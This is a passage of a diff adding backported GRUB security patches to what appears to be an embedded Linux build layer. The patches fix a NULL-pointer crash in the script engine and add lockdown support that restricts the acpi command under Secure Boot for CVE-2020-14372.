diff --git a/meta/recipes-bsp/grub/files/0046-script-execute-Avoid-crash-when-using-outside-a-func.patch b/meta/recipes-bsp/grub/files/0046-script-execute-Avoid-crash-when-using-outside-a-func.patch
new file mode 100644
index 0000000000..84117a9073
--- /dev/null
+++ b/meta/recipes-bsp/grub/files/0046-script-execute-Avoid-crash-when-using-outside-a-func.patch
@@ -0,0 +1,37 @@
+From df2505c4c3cf42b0c419c99a5f9e1ce63e5a5938 Mon Sep 17 00:00:00 2001
+From: Daniel Axtens <dja@axtens.net>
+Date: Mon, 11 Jan 2021 17:30:42 +1100
+Subject: [PATCH] script/execute: Avoid crash when using "$#" outside a
+ function scope
+
+"$#" represents the number of arguments to a function. It is only
+defined in a function scope, where "scope" is non-NULL. Currently,
+if we attempt to evaluate "$#" outside a function scope, "scope" will
+be NULL and we will crash with a NULL pointer dereference.
+
+Do not attempt to count arguments for "$#" if "scope" is NULL. This
+will result in "$#" being interpreted as an empty string if evaluated
+outside a function scope.
+
+Signed-off-by: Daniel Axtens <dja@axtens.net>
+Reviewed-by: Daniel Kiper <daniel.kiper@oracle.com>
+
+Upstream-Status: Backport [https://git.savannah.gnu.org/cgit/grub.git/commit/?id=fe0586347ee46f927ae27bb9673532da9f5dead5]
+Signed-off-by: Marta Rybczynska <marta.rybczynska@huawei.com>
+---
+ grub-core/script/execute.c | 2 +-
+ 1 file changed, 1 insertion(+), 1 deletion(-)
+
+diff --git a/grub-core/script/execute.c b/grub-core/script/execute.c
+index 5ea2aef..23d34bd 100644
+--- a/grub-core/script/execute.c
++++ b/grub-core/script/execute.c
+@@ -485,7 +485,7 @@ gettext_putvar (const char *str, grub_size_t len,
+     return 0;
+ 
+   /* Enough for any number.  */
+-  if (len == 1 && str[0] == '#')
++  if (len == 1 && str[0] == '#' && scope != NULL)
+     {
+       grub_snprintf (*ptr, 30, "%u", scope->argv.argc);
+       *ptr += grub_strlen (*ptr);
diff --git a/meta/recipes-bsp/grub/files/CVE-2020-14309-CVE-2020-14310-CVE-2020-14311-malloc-Use-overflow-checking-primitives-where-we-do-.patch b/meta/recipes-bsp/grub/files/CVE-2020-14309-CVE-2020-14310-CVE-2020-14311-malloc-Use-overflow-checking-primitives-where-we-do-.patch
index 896a2145d4..7214ead9a7 100644
--- a/meta/recipes-bsp/grub/files/CVE-2020-14309-CVE-2020-14310-CVE-2020-14311-malloc-Use-overflow-checking-primitives-where-we-do-.patch
+++ b/meta/recipes-bsp/grub/files/CVE-2020-14309-CVE-2020-14310-CVE-2020-14311-malloc-Use-overflow-checking-primitives-where-we-do-.patch
@@ -30,7 +30,7 @@ Signed-off-by: Peter Jones <pjones@redhat.com>
 Reviewed-by: Daniel Kiper <daniel.kiper@oracle.com>
 
 Upstream-Status: Backport
-CVE: CVE-2020-14309, CVE-2020-14310, CVE-2020-14311
+CVE: CVE-2020-14309 CVE-2020-14310 CVE-2020-14311
 
 Reference to upstream patch:
 https://git.savannah.gnu.org/cgit/grub.git/commit/?id=3f05d693d1274965ffbe4ba99080dc2c570944c6
diff --git a/meta/recipes-bsp/grub/files/CVE-2020-14372.patch b/meta/recipes-bsp/grub/files/CVE-2020-14372.patch
new file mode 100644
index 0000000000..08e7666cde
--- /dev/null
+++ b/meta/recipes-bsp/grub/files/CVE-2020-14372.patch
@@ -0,0 +1,76 @@
+From 0d237c0b90f0c6d4a3662c569b2371ae3ed69574 Mon Sep 17 00:00:00 2001
+From: Javier Martinez Canillas <javierm@redhat.com>
+Date: Mon, 28 Sep 2020 20:08:41 +0200
+Subject: [PATCH] acpi: Don't register the acpi command when locked down
+MIME-Version: 1.0
+Content-Type: text/plain; charset=UTF-8
+Content-Transfer-Encoding: 8bit
+
+The command is not allowed when lockdown is enforced. Otherwise an
+attacker can instruct the GRUB to load an SSDT table to overwrite
+the kernel lockdown configuration and later load and execute
+unsigned code.
+
+Fixes: CVE-2020-14372
+
+Reported-by: Máté Kukri <km@mkukri.xyz>
+Signed-off-by: Javier Martinez Canillas <javierm@redhat.com>
+Reviewed-by: Daniel Kiper <daniel.kiper@oracle.com>
+
+Upstream-Status: Backport [https://git.savannah.gnu.org/cgit/grub.git/commit/?id=3e8e4c0549240fa209acffceb473e1e509b50c95]
+CVE: CVE-2020-14372
+Signed-off-by: Marta Rybczynska <marta.rybczynska@huawei.com>
+---
+ docs/grub.texi            |  5 +++++
+ grub-core/commands/acpi.c | 15 ++++++++-------
+ 2 files changed, 13 insertions(+), 7 deletions(-)
+
+diff --git a/docs/grub.texi b/docs/grub.texi
+index 0786427..47ac7ff 100644
+--- a/docs/grub.texi
++++ b/docs/grub.texi
+@@ -3986,6 +3986,11 @@ Normally, this command will replace the Root System Description Pointer
+ (RSDP) in the Extended BIOS Data Area to point to the new tables. If the
+ @option{--no-ebda} option is used, the new tables will be known only to
+ GRUB, but may be used by GRUB's EFI emulation.
++
++Note: The command is not allowed when lockdown is enforced (@pxref{Lockdown}).
++      Otherwise an attacker can instruct the GRUB to load an SSDT table to
++      overwrite the kernel lockdown configuration and later load and execute
++      unsigned code.
+ @end deffn
+ 
+ 
+diff --git a/grub-core/commands/acpi.c b/grub-core/commands/acpi.c
+index 5a1499a..1215f2a 100644
+--- a/grub-core/commands/acpi.c
++++ b/grub-core/commands/acpi.c
+@@ -27,6 +27,7 @@
+ #include <grub/mm.h>
+ #include <grub/memory.h>
+ #include <grub/i18n.h>
++#include <grub/lockdown.h>
+ 
+ #ifdef GRUB_MACHINE_EFI
+ #include <grub/efi/efi.h>
+@@ -775,13 +776,13 @@ static grub_extcmd_t cmd;
+ 
+ GRUB_MOD_INIT(acpi)
+ {
+-  cmd = grub_register_extcmd ("acpi", grub_cmd_acpi, 0,
+-			      N_("[-1|-2] [--exclude=TABLE1,TABLE2|"
+-			      "--load-only=TABLE1,TABLE2] FILE1"
+-			      " [FILE2] [...]"),
+-			      N_("Load host ACPI tables and tables "
+-			      "specified by arguments."),
+-			      options);
++  cmd = grub_register_extcmd_lockdown ("acpi", grub_cmd_acpi, 0,
++                                       N_("[-1|-2] [--exclude=TABLE1,TABLE2|"
++                                          "--load-only=TABLE1,TABLE2] FILE1"
++                                          " [FILE2] [...]"),
++                                       N_("Load host ACPI tables and tables "
++                                          "specified by arguments."),
++                                       options);
+ }
+ 
+ GRUB_MOD_FINI(acpi)
diff --git a/meta/recipes-bsp/grub/files/CVE-2020-14372_1.patch b/meta/recipes-bsp/grub/files/CVE-2020-14372_1.patch
new file mode 100644
index 0000000000..745f335501
--- /dev/null
+++ b/meta/recipes-bsp/grub/files/CVE-2020-14372_1.patch
@@ -0,0 +1,130 @@
+From fe7a13df6200bda934fcc0246458df249f1ef4f2 Mon Sep 17 00:00:00 2001
+From: Marco A Benatto <mbenatto@redhat.com>
+Date: Wed, 23 Sep 2020 11:33:33 -0400
+Subject: [PATCH] verifiers: Move verifiers API to kernel image
+
+Move verifiers API from a module to the kernel image, so it can be
+used there as well. There are no functional changes in this patch.
+
+Signed-off-by: Marco A Benatto <mbenatto@redhat.com>
+Signed-off-by: Javier Martinez Canillas <javierm@redhat.com>
+Reviewed-by: Daniel Kiper <daniel.kiper@oracle.com>
+
+Upstream-Status: Backport [https://git.savannah.gnu.org/cgit/grub.git/commit/?id=9e95f45ceeef36fcf93cbfffcf004276883dbc99]
+CVE: CVE-2020-14372
+Signed-off-by: Marta Rybczynska <marta.rybczynska@huawei.com>
+---
+ grub-core/Makefile.am                    | 1 +
+ grub-core/Makefile.core.def              | 6 +-----
+ grub-core/kern/main.c                    | 4 ++++
+ grub-core/{commands => kern}/verifiers.c | 8 ++------
+ include/grub/verify.h                    | 9 ++++++---
+ 5 files changed, 14 insertions(+), 14 deletions(-)
+ rename grub-core/{commands => kern}/verifiers.c (97%)
+
+diff --git a/grub-core/Makefile.am b/grub-core/Makefile.am
+index 3ea8e7f..375c30d 100644
+--- a/grub-core/Makefile.am
++++ b/grub-core/Makefile.am
+@@ -90,6 +90,7 @@ KERNEL_HEADER_FILES += $(top_srcdir)/include/grub/parser.h
+ KERNEL_HEADER_FILES += $(top_srcdir)/include/grub/partition.h
+ KERNEL_HEADER_FILES += $(top_srcdir)/include/grub/term.h
+ KERNEL_HEADER_FILES += $(top_srcdir)/include/grub/time.h
++KERNEL_HEADER_FILES += $(top_srcdir)/include/grub/verify.h
+ KERNEL_HEADER_FILES += $(top_srcdir)/include/grub/mm_private.h
+ KERNEL_HEADER_FILES += $(top_srcdir)/include/grub/net.h
+ KERNEL_HEADER_FILES += $(top_srcdir)/include/grub/memory.h
+diff --git a/grub-core/Makefile.core.def b/grub-core/Makefile.core.def
+index 474a63e..cff02f2 100644
+--- a/grub-core/Makefile.core.def
++++ b/grub-core/Makefile.core.def
+@@ -140,6 +140,7 @@ kernel = {
+   common = kern/rescue_parser.c;
+   common = kern/rescue_reader.c;
+   common = kern/term.c;
++  common = kern/verifiers.c;
+ 
+   noemu = kern/compiler-rt.c;
+   noemu = kern/mm.c;
+@@ -942,11 +943,6 @@ module = {
+   cppflags = '-I$(srcdir)/lib/posix_wrap';
+ };
+ 
+-module = {
+-  name = verifiers;
+-  common = commands/verifiers.c;
+-};
+-
+ module = {
+   name = shim_lock;
+   common = commands/efi/shim_lock.c;
+diff --git a/grub-core/kern/main.c b/grub-core/kern/main.c
+index 9cad0c4..73967e2 100644
+--- a/grub-core/kern/main.c
++++ b/grub-core/kern/main.c
+@@ -29,6 +29,7 @@
+ #include <grub/command.h>
+ #include <grub/reader.h>
+ #include <grub/parser.h>
++#include <grub/verify.h>
+ 
+ #ifdef GRUB_MACHINE_PCBIOS
+ #include <grub/machine/memory.h>
+@@ -274,6 +275,9 @@ grub_main (void)
+   grub_printf ("Welcome to GRUB!\n\n");
+   grub_setcolorstate (GRUB_TERM_COLOR_STANDARD);
+ 
++  /* Init verifiers API. */
++  grub_verifiers_init ();
++
+   grub_load_config ();
+ 
+   grub_boot_time ("Before loading embedded modules.");
+diff --git a/grub-core/commands/verifiers.c b/grub-core/kern/verifiers.c
+similarity index 97%
+rename from grub-core/commands/verifiers.c
+rename to grub-core/kern/verifiers.c
+index 0dde481..aa3dc7c 100644
+--- a/grub-core/commands/verifiers.c
++++ b/grub-core/kern/verifiers.c
+@@ -217,12 +217,8 @@ grub_verify_string (char *str, enum grub_verify_string_type type)
+   return GRUB_ERR_NONE;
+ }
+ 
+-GRUB_MOD_INIT(verifiers)
++void
++grub_verifiers_init (void)
+ {
+   grub_file_filter_register (GRUB_FILE_FILTER_VERIFY, grub_verifiers_open);
+ }
+-
+-GRUB_MOD_FINI(verifiers)
+-{
+-  grub_file_filter_unregister (GRUB_FILE_FILTER_VERIFY);
+-}
+diff --git a/include/grub/verify.h b/include/grub/verify.h
+index ea04914..cd129c3 100644
+--- a/include/grub/verify.h
++++ b/include/grub/verify.h
+@@ -64,7 +64,10 @@ struct grub_file_verifier
+   grub_err_t (*verify_string) (char *str, enum grub_verify_string_type type);
+ };
+ 
+-extern struct grub_file_verifier *grub_file_verifiers;
++extern struct grub_file_verifier *EXPORT_VAR (grub_file_verifiers);
++
++extern void
++grub_verifiers_init (void);
+ 
+ static inline void
+ grub_verifier_register (struct grub_file_verifier *ver)
+@@ -78,7 +81,7 @@ grub_verifier_unregister (struct grub_file_verifier *ver)
+   grub_list_remove (GRUB_AS_LIST (ver));
+ }
+ 
+-grub_err_t
+-grub_verify_string (char *str, enum grub_verify_string_type type);
++extern grub_err_t
++EXPORT_FUNC (grub_verify_string) (char *str, enum grub_verify_string_type type);
+ 
+ #endif /* ! GRUB_VERIFY_HEADER */
diff --git a/meta/recipes-bsp/grub/files/CVE-2020-14372_2.patch b/meta/recipes-bsp/grub/files/CVE-2020-14372_2.patch
new file mode 100644
index 0000000000..a98b5d0455
--- /dev/null
+++ b/meta/recipes-bsp/grub/files/CVE-2020-14372_2.patch
@@ -0,0 +1,431 @@
+From d8aac4517fef0f0188a60a2a8ff9cafdd9c7ca42 Mon Sep 17 00:00:00 2001
+From: Javier Martinez Canillas <javierm@redhat.com>
+Date: Mon, 28 Sep 2020 20:08:02 +0200
+Subject: [PATCH] kern: Add lockdown support
+
+When the GRUB starts on a secure boot platform, some commands can be
+used to subvert the protections provided by the verification mechanism and
+could lead to booting untrusted system.
+
+To prevent that situation, allow GRUB to be locked down. That way the code
+may check if GRUB has been locked down and further restrict the commands
+that are registered or what subset of their functionality could be used.
+
+The lockdown support adds the following components:
+
+* The grub_lockdown() function which can be used to lockdown GRUB if,
+  e.g., UEFI Secure Boot is enabled.
+
+* The grub_is_lockdown() function which can be used to check if the GRUB
+  was locked down.
+
+* A verifier that flags OS kernels, the GRUB modules, Device Trees and ACPI
+  tables as GRUB_VERIFY_FLAGS_DEFER_AUTH to defer verification to other
+  verifiers. These files are only successfully verified if another registered
+  verifier returns success. Otherwise, the whole verification process fails.
+
+  For example, PE/COFF binaries verification can be done by the shim_lock
+  verifier which validates the signatures using the shim_lock protocol.
+  However, the verification is not deferred directly to the shim_lock verifier.
+  The shim_lock verifier is hooked into the verification process instead.
+
+* A set of grub_{command,extcmd}_lockdown functions that can be used by
+  code registering command handlers, to only register unsafe commands if
+  the GRUB has not been locked down.
+
+Signed-off-by: Javier Martinez Canillas <javierm@redhat.com>
+Reviewed-by: Daniel Kiper <daniel.kiper@oracle.com>
+
+Upstream-Status: Backport [https://git.savannah.gnu.org/cgit/grub.git/commit/?id=578c95298bcc46e0296f4c786db64c2ff26ce2cc]
+CVE: CVE-2020-14372
+Signed-off-by: Marta Rybczynska <marta.rybczynska@huawei.com>
+---
+ conf/Makefile.common        |  2 +
+ docs/grub-dev.texi          | 27 +++++++++++++
+ docs/grub.texi              |  8 ++++
+ grub-core/Makefile.am       |  5 ++-
+ grub-core/Makefile.core.def |  1 +
+ grub-core/commands/extcmd.c | 23 +++++++++++
+ grub-core/kern/command.c    | 24 +++++++++++
+ grub-core/kern/lockdown.c   | 80 +++++++++++++++++++++++++++++++++++++
+ include/grub/command.h      |  5 +++
+ include/grub/extcmd.h       |  7 ++++
+ include/grub/lockdown.h     | 44 ++++++++++++++++++++
+ 11 files changed, 225 insertions(+), 1 deletion(-)
+ create mode 100644 grub-core/kern/lockdown.c
+ create mode 100644 include/grub/lockdown.h
+
+diff --git a/conf/Makefile.common b/conf/Makefile.common
+index 6cd71cb..2a1a886 100644
+--- a/conf/Makefile.common
++++ b/conf/Makefile.common
+@@ -84,7 +84,9 @@ CPPFLAGS_PARTTOOL_LIST = -Dgrub_parttool_register=PARTTOOL_LIST_MARKER
+ CPPFLAGS_TERMINAL_LIST = '-Dgrub_term_register_input(...)=INPUT_TERMINAL_LIST_MARKER(__VA_ARGS__)'
+ CPPFLAGS_TERMINAL_LIST += '-Dgrub_term_register_output(...)=OUTPUT_TERMINAL_LIST_MARKER(__VA_ARGS__)'
+ CPPFLAGS_COMMAND_LIST = '-Dgrub_register_command(...)=COMMAND_LIST_MARKER(__VA_ARGS__)'
++CPPFLAGS_COMMAND_LIST += '-Dgrub_register_command_lockdown(...)=COMMAND_LOCKDOWN_LIST_MARKER(__VA_ARGS__)'
+ CPPFLAGS_COMMAND_LIST += '-Dgrub_register_extcmd(...)=EXTCOMMAND_LIST_MARKER(__VA_ARGS__)'
++CPPFLAGS_COMMAND_LIST += '-Dgrub_register_extcmd_lockdown(...)=EXTCOMMAND_LOCKDOWN_LIST_MARKER(__VA_ARGS__)'
+ CPPFLAGS_COMMAND_LIST += '-Dgrub_register_command_p1(...)=P1COMMAND_LIST_MARKER(__VA_ARGS__)'
+ CPPFLAGS_FDT_LIST := '-Dgrub_fdtbus_register(...)=FDT_DRIVER_LIST_MARKER(__VA_ARGS__)'
+ CPPFLAGS_MARKER = $(CPPFLAGS_FS_LIST) $(CPPFLAGS_VIDEO_LIST) \
+diff --git a/docs/grub-dev.texi b/docs/grub-dev.texi
+index ee389fd..635ec72 100644
+--- a/docs/grub-dev.texi
++++ b/docs/grub-dev.texi
+@@ -86,6 +86,7 @@ This edition documents version @value{VERSION}.
+ * PFF2 Font File Format::
+ * Graphical Menu Software Design::
+ * Verifiers framework::
++* Lockdown framework::
+ * Copying This Manual::         Copying This Manual
+ * Index::
+ @end menu
+@@ -2086,6 +2087,32 @@ Optionally at the end of the file @samp{fini}, if it exists, is called with just
+ the context. If you return no error during any of @samp{init}, @samp{write} and
+ @samp{fini} then the file is considered as having succeded verification.
+ 
++@node Lockdown framework
++@chapter Lockdown framework
++
++The GRUB can be locked down, which is a restricted mode where some operations
++are not allowed. For instance, some commands cannot be used when the GRUB is
++locked down.
++
++The function
++@code{grub_lockdown()} is used to lockdown GRUB and the function
++@code{grub_is_lockdown()} function can be used to check whether lockdown is
++enabled or not. When enabled, the function returns @samp{GRUB_LOCKDOWN_ENABLED}
++and @samp{GRUB_LOCKDOWN_DISABLED} when is not enabled.
++
++The following functions can be used to register the commands that can only be
++used when lockdown is disabled:
++
++@itemize
++
++@item @code{grub_cmd_lockdown()} registers command which should not run when the
++GRUB is in lockdown mode.
++
++@item @code{grub_cmd_lockdown()} registers extended command which should not run
++when the GRUB is in lockdown mode.
++
++@end itemize
++
+ @node Copying This Manual
+ @appendix Copying This Manual
+ 
+diff --git a/docs/grub.texi b/docs/grub.texi
+index 8779507..d778bfb 100644
+--- a/docs/grub.texi
++++ b/docs/grub.texi
+@@ -5581,6 +5581,7 @@ environment variables and commands are listed in the same order.
+ * Using digital signatures::         Booting digitally signed code
+ * UEFI secure boot and shim::        Booting digitally signed PE files
+ * Measured Boot::                    Measuring boot components
++* Lockdown::                         Lockdown when booting on a secure setup
+ @end menu
+ 
+ @node Authentication and authorisation
+@@ -5794,6 +5795,13 @@ into @file{core.img} in order to avoid a potential gap in measurement between
+ 
+ Measured boot is currently only supported on EFI platforms.
+ 
++@node Lockdown
++@section Lockdown when booting on a secure setup
++
++The GRUB can be locked down when booted on a secure boot environment, for example
++if the UEFI secure boot is enabled. On a locked down configuration, the GRUB will
++be restricted and some operations/commands cannot be executed.
++
+ @node Platform limitations
+ @chapter Platform limitations
+ 
+diff --git a/grub-core/Makefile.am b/grub-core/Makefile.am
+index 375c30d..3096241 100644
+--- a/grub-core/Makefile.am
++++ b/grub-core/Makefile.am
+@@ -79,6 +79,7 @@ KERNEL_HEADER_FILES += $(top_srcdir)/include/grub/fs.h
+ KERNEL_HEADER_FILES += $(top_srcdir)/include/grub/i18n.h
+ KERNEL_HEADER_FILES += $(top_srcdir)/include/grub/kernel.h
+ KERNEL_HEADER_FILES += $(top_srcdir)/include/grub/list.h
++KERNEL_HEADER_FILES += $(top_srcdir)/include/grub/lockdown.h
+ KERNEL_HEADER_FILES += $(top_srcdir)/include/grub/misc.h
+ if COND_emu
+ KERNEL_HEADER_FILES += $(top_srcdir)/include/grub/compiler-rt-emu.h
+@@ -376,8 +377,10 @@ command.lst: $(MARKER_FILES)
+ 	  b=`basename $$pp .marker`; \
+ 	  sed -n \
+ 	    -e "/EXTCOMMAND_LIST_MARKER *( *\"/{s/.*( *\"\([^\"]*\)\".*/*\1: $$b/;p;}" \
++	    -e "/EXTCOMMAND_LOCKDOWN_LIST_MARKER *( *\"/{s/.*( *\"\([^\"]*\)\".*/*\1: $$b/;p;}" \
+ 	    -e "/P1COMMAND_LIST_MARKER *( *\"/{s/.*( *\"\([^\"]*\)\".*/*\1: $$b/;p;}" \
+-	    -e "/COMMAND_LIST_MARKER *( *\"/{s/.*( *\"\([^\"]*\)\".*/\1: $$b/;p;}" $$pp; \
++	    -e "/COMMAND_LIST_MARKER *( *\"/{s/.*( *\"\([^\"]*\)\".*/\1: $$b/;p;}" \
++	    -e "/COMMAND_LOCKDOWN_LIST_MARKER *( *\"/{s/.*( *\"\([^\"]*\)\".*/\1: $$b/;p;}" $$pp; \
+ 	done) | sort -u > $@
+ platform_DATA += command.lst
+ CLEANFILES += command.lst
+diff --git a/grub-core/Makefile.core.def b/grub-core/Makefile.core.def
+index cff02f2..651ea2a 100644
+--- a/grub-core/Makefile.core.def
++++ b/grub-core/Makefile.core.def
+@@ -204,6 +204,7 @@ kernel = {
+   efi = term/efi/console.c;
+   efi = kern/acpi.c;
+   efi = kern/efi/acpi.c;
++  efi = kern/lockdown.c;
+   i386_coreboot = kern/i386/pc/acpi.c;
+   i386_multiboot = kern/i386/pc/acpi.c;
+   i386_coreboot = kern/acpi.c;
+diff --git a/grub-core/commands/extcmd.c b/grub-core/commands/extcmd.c
+index 69574e2..90a5ca2 100644
+--- a/grub-core/commands/extcmd.c
++++ b/grub-core/commands/extcmd.c
+@@ -19,6 +19,7 @@
+ 
+ #include <grub/mm.h>
+ #include <grub/list.h>
++#include <grub/lockdown.h>
+ #include <grub/misc.h>
+ #include <grub/extcmd.h>
+ #include <grub/script_sh.h>
+@@ -110,6 +111,28 @@ grub_register_extcmd (const char *name, grub_extcmd_func_t func,
+ 				    summary, description, parser, 1);
+ }
+ 
++static grub_err_t
++grub_extcmd_lockdown (grub_extcmd_context_t ctxt __attribute__ ((unused)),
++                      int argc __attribute__ ((unused)),
++                      char **argv __attribute__ ((unused)))
++{
++  return grub_error (GRUB_ERR_ACCESS_DENIED,
++                     N_("%s: the command is not allowed when lockdown is enforced"),
++                     ctxt->extcmd->cmd->name);
++}
++
++grub_extcmd_t
++grub_register_extcmd_lockdown (const char *name, grub_extcmd_func_t func,
++                               grub_command_flags_t flags, const char *summary,
++                               const char *description,
++                               const struct grub_arg_option *parser)
++{
++  if (grub_is_lockdown () == GRUB_LOCKDOWN_ENABLED)
++    func = grub_extcmd_lockdown;
++
++  return grub_register_extcmd (name, func, flags, summary, description, parser);
++}
++
+ void
+ grub_unregister_extcmd (grub_extcmd_t ext)
+ {
+diff --git a/grub-core/kern/command.c b/grub-core/kern/command.c
+index acd7218..4aabcd4 100644
+--- a/grub-core/kern/command.c
++++ b/grub-core/kern/command.c
+@@ -17,6 +17,7 @@
+  *  along with GRUB.  If not, see <http://www.gnu.org/licenses/>.
+  */
+ 
++#include <grub/lockdown.h>
+ #include <grub/mm.h>
+ #include <grub/command.h>
+ 
+@@ -77,6 +78,29 @@ grub_register_command_prio (const char *name,
+   return cmd;
+ }
+ 
++static grub_err_t
++grub_cmd_lockdown (grub_command_t cmd __attribute__ ((unused)),
++                   int argc __attribute__ ((unused)),
++                   char **argv __attribute__ ((unused)))
++
++{
++  return grub_error (GRUB_ERR_ACCESS_DENIED,
++                     N_("%s: the command is not allowed when lockdown is enforced"),
++                     cmd->name);
++}
++
++grub_command_t
++grub_register_command_lockdown (const char *name,
++                                grub_command_func_t func,
++                                const char *summary,
++                                const char *description)
++{
++  if (grub_is_lockdown () == GRUB_LOCKDOWN_ENABLED)
++    func = grub_cmd_lockdown;
++
++  return grub_register_command_prio (name, func, summary, description, 0);
++}
++
+ void
+ grub_unregister_command (grub_command_t cmd)
+ {
+diff --git a/grub-core/kern/lockdown.c b/grub-core/kern/lockdown.c
+new file mode 100644
+index 0000000..1e56c0b
+--- /dev/null
++++ b/grub-core/kern/lockdown.c
+@@ -0,0 +1,80 @@
++/*
++ *  GRUB  --  GRand Unified Bootloader
++ *  Copyright (C) 2020  Free Software Foundation, Inc.
++ *
++ *  GRUB is free software: you can redistribute it and/or modify
++ *  it under the terms of the GNU General Public License as published by
++ *  the Free Software Foundation, either version 3 of the License, or
++ *  (at your option) any later version.
++ *
++ *  GRUB is distributed in the hope that it will be useful,
++ *  but WITHOUT ANY WARRANTY; without even the implied warranty of
++ *  MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
++ *  GNU General Public License for more details.
++ *
++ *  You should have received a copy of the GNU General Public License
++ *  along with GRUB.  If not, see <http://www.gnu.org/licenses/>.
++ *
++ */
++
++#include <grub/dl.h>
++#include <grub/file.h>
++#include <grub/lockdown.h>
++#include <grub/verify.h>
++
++static int lockdown = GRUB_LOCKDOWN_DISABLED;
++
++static grub_err_t
++lockdown_verifier_init (grub_file_t io __attribute__ ((unused)),
++                    enum grub_file_type type,
++                    void **context __attribute__ ((unused)),
++                    enum grub_verify_flags *flags)
++{
++  *flags = GRUB_VERIFY_FLAGS_SKIP_VERIFICATION;
++
++  switch (type & GRUB_FILE_TYPE_MASK)
++    {
++    case GRUB_FILE_TYPE_GRUB_MODULE:
++    case GRUB_FILE_TYPE_LINUX_KERNEL:
++    case GRUB_FILE_TYPE_MULTIBOOT_KERNEL:
++    case GRUB_FILE_TYPE_XEN_HYPERVISOR:
++    case GRUB_FILE_TYPE_BSD_KERNEL:
++    case GRUB_FILE_TYPE_XNU_KERNEL:
++    case GRUB_FILE_TYPE_PLAN9_KERNEL:
++    case GRUB_FILE_TYPE_NTLDR:
++    case GRUB_FILE_TYPE_TRUECRYPT:
++    case GRUB_FILE_TYPE_FREEDOS:
++    case GRUB_FILE_TYPE_PXECHAINLOADER:
++    case GRUB_FILE_TYPE_PCCHAINLOADER:
++    case GRUB_FILE_TYPE_COREBOOT_CHAINLOADER:
++    case GRUB_FILE_TYPE_EFI_CHAINLOADED_IMAGE:
++    case GRUB_FILE_TYPE_ACPI_TABLE:
++    case GRUB_FILE_TYPE_DEVICE_TREE_IMAGE:
++      *flags = GRUB_VERIFY_FLAGS_DEFER_AUTH;
++
++      /* Fall through. */
++
++    default:
++      return GRUB_ERR_NONE;
++    }
++}
++
++struct grub_file_verifier lockdown_verifier =
++  {
++    .name = "lockdown_verifier",
++    .init = lockdown_verifier_init,
++  };
++
++void
++grub_lockdown (void)
++{
++  lockdown = GRUB_LOCKDOWN_ENABLED;
++
++  grub_verifier_register (&lockdown_verifier);
++}
++
++int
++grub_is_lockdown (void)
++{
++  return lockdown;
++}
+diff --git a/include/grub/command.h b/include/grub/command.h
+index eee4e84..2a6f7f8 100644
+--- a/include/grub/command.h
++++ b/include/grub/command.h
+@@ -86,6 +86,11 @@ EXPORT_FUNC(grub_register_command_prio) (const char *name,
+ 					 const char *summary,
+ 					 const char *description,
+ 					 int prio);
++grub_command_t
++EXPORT_FUNC(grub_register_command_lockdown) (const char *name,
++                                             grub_command_func_t func,
++                                             const char *summary,
++                                             const char *description);
+ void EXPORT_FUNC(grub_unregister_command) (grub_command_t cmd);
+ 
+ static inline grub_command_t
+diff --git a/include/grub/extcmd.h b/include/grub/extcmd.h
+index 19fe592..fe9248b 100644
+--- a/include/grub/extcmd.h
++++ b/include/grub/extcmd.h
+@@ -62,6 +62,13 @@ grub_extcmd_t EXPORT_FUNC(grub_register_extcmd) (const char *name,
+ 						 const char *description,
+ 						 const struct grub_arg_option *parser);
+ 
++grub_extcmd_t EXPORT_FUNC(grub_register_extcmd_lockdown) (const char *name,
++                                                          grub_extcmd_func_t func,
++                                                          grub_command_flags_t flags,
++                                                          const char *summary,
++                                                          const char *description,
++                                                          const struct grub_arg_option *parser);
++
+ grub_extcmd_t EXPORT_FUNC(grub_register_extcmd_prio) (const char *name,
+ 						      grub_extcmd_func_t func,
+ 						      grub_command_flags_t flags,
+diff --git a/include/grub/lockdown.h b/include/grub/lockdown.h
+new file mode 100644
+index 0000000..40531fa
+--- /dev/null
++++ b/include/grub/lockdown.h
+@@ -0,0 +1,44 @@
++/*
++ *  GRUB  --  GRand Unified Bootloader
++ *  Copyright (C) 2020  Free Software Foundation, Inc.
++ *
++ *  GRUB is free software: you can redistribute it and/or modify
++ *  it under the terms of the GNU General Public License as published by
++ *  the Free Software Foundation, either version 3 of the License, or
++ *  (at your option) any later version.
++ *
++ *  GRUB is distributed in the hope that it will be useful,
++ *  but WITHOUT ANY WARRANTY; without even the implied warranty of
++ *  MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
++ *  GNU General Public License for more details.
++ *
++ *  You should have received a copy of the GNU General Public License
++ *  along with GRUB.  If not, see <http://www.gnu.org/licenses/>.
++ */
++
++#ifndef GRUB_LOCKDOWN_H
++#define GRUB_LOCKDOWN_H 1
++
++#include <grub/symbol.h>
++
++#define GRUB_LOCKDOWN_DISABLED       0
++#define GRUB_LOCKDOWN_ENABLED        1
++
++#ifdef GRUB_MACHINE_EFI
++extern void
++EXPORT_FUNC (grub_lockdown) (void);
++extern int
++EXPORT_FUNC (grub_is_lockdown) (void);
++#else
++static inline void
++grub_lockdown (void)
++{
++}
++
++static inline int
++grub_is_lockdown (void)
++{
++  return GRUB_LOCKDOWN_DISABLED;
++}
++#endif
++#endif /* ! GRUB_LOCKDOWN_H */
diff --git a/meta/recipes-bsp/grub/files/CVE-2020-14372_3.patch b/meta/recipes-bsp/grub/files/CVE-2020-14372_3.patch
new file mode 100644
index 0000000000..93fdd2cb1a
--- /dev/null
+++ b/meta/recipes-bsp/grub/files/CVE-2020-14372_3.patch
@@ -0,0 +1,57 @@
+From bfb9c44298aa202c176fef8dc5ea48f9b0e76e5e Mon Sep 17 00:00:00 2001
+From: Javier Martinez Canillas <javierm@redhat.com>
+Date: Tue, 2 Feb 2021 19:59:48 +0100
+Subject: [PATCH] kern/lockdown: Set a variable if the GRUB is locked down
+
+It may be useful for scripts to determine whether the GRUB is locked
+down or not. Add the lockdown variable which is set to "y" when the GRUB
+is locked down.
+
+Suggested-by: Dimitri John Ledkov <xnox@ubuntu.com>
+Signed-off-by: Javier Martinez Canillas <javierm@redhat.com>
+Reviewed-by: Daniel Kiper <daniel.kiper@oracle.com>
+
+Upstream-Status: Backport [https://git.savannah.gnu.org/cgit/grub.git/commit/?id=d90367471779c240e002e62edfb6b31fc85b4908]
+CVE: CVE-2020-14372
+Signed-off-by: Marta Rybczynska <marta.rybczynska@huawei.com>
+---
+ docs/grub.texi            | 3 +++
+ grub-core/kern/lockdown.c | 4 ++++
+ 2 files changed, 7 insertions(+)
+
+diff --git a/docs/grub.texi b/docs/grub.texi
+index d778bfb..5e6cace 100644
+--- a/docs/grub.texi
